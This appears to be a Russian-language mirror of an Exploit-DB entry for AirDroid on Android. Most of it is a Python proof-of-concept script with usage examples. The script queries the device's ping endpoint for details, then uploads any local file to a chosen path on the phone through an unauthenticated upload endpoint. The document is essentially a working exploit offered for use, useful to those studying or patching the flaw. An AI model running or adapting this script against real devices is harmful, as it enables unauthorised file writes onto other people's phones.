- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 37504
- Проверка EDB
-
- Пройдено
- Автор
- PARSA ADIB
- Тип уязвимости
- WEBAPPS
- Платформа
- ANDROID
- CVE
- null
- Дата публикации
- 2015-07-06
AirDroid - Arbitrary File Upload
Код:
#/IN THE NAME OF GOD
#/auth====PARSA ADIB
import sys,requests,re,urllib2
def logo():
print"\t\t .__ .___ .__ .___"
print"\t\t_____ |__|______ __| _/______ ____ |__| __| _/"
print"\t\t\__ \ | \_ __ \/ __ |\_ __ \/ _ \| |/ __ | "
print"\t\t / __ \| || | \/ /_/ | | | \( <_> ) / /_/ | "
print"\t\t(____ /__||__| \____ | |__| \____/|__\____ | "
print"\t\t \/ \/ \/ "
print "\t\tAIRDROID VerAll UPLOAD AUTH BYPASS PoC @ Parsa Adib"
if len(sys.argv)<6 or len(sys.argv)>6 :
logo()
print "\t\tUSAGE:python exploit.py ip port remote-file-name local-file-name remote-file-path"
print "\t\tEXAMPLE:python exploit.py 192.168.1.2 8888 poc poc.txt /sdcard"
else :
logo()
print "\n[+]Reciving Details\n-----------------------------"
try :
p = requests.get('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/ping/')
except IOError :
print "\n[!] Check If server is Running"
sys.exit()
for i in p.content.split(',') :
for char in '{"}_':
i = i.replace(char,'').upper()
print "[*]"+i+""
print "\n[+]Sending File\n-----------------------------"
try :
r = requests.post('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/upload/dir?fn='+sys.argv[3]+'&d='+sys.argv[5]+'&after=1&fname='+sys.argv[3], files={sys.argv[4]: open(sys.argv[4], 'rb').read()})
if (r.status_code == 200) :
print "[*]RESPONSE:200"
print "[*]FILE SENT SUCCESSFULY"
except IOError :
print "\n[!] Error"- Источник
- www.exploit-db.com
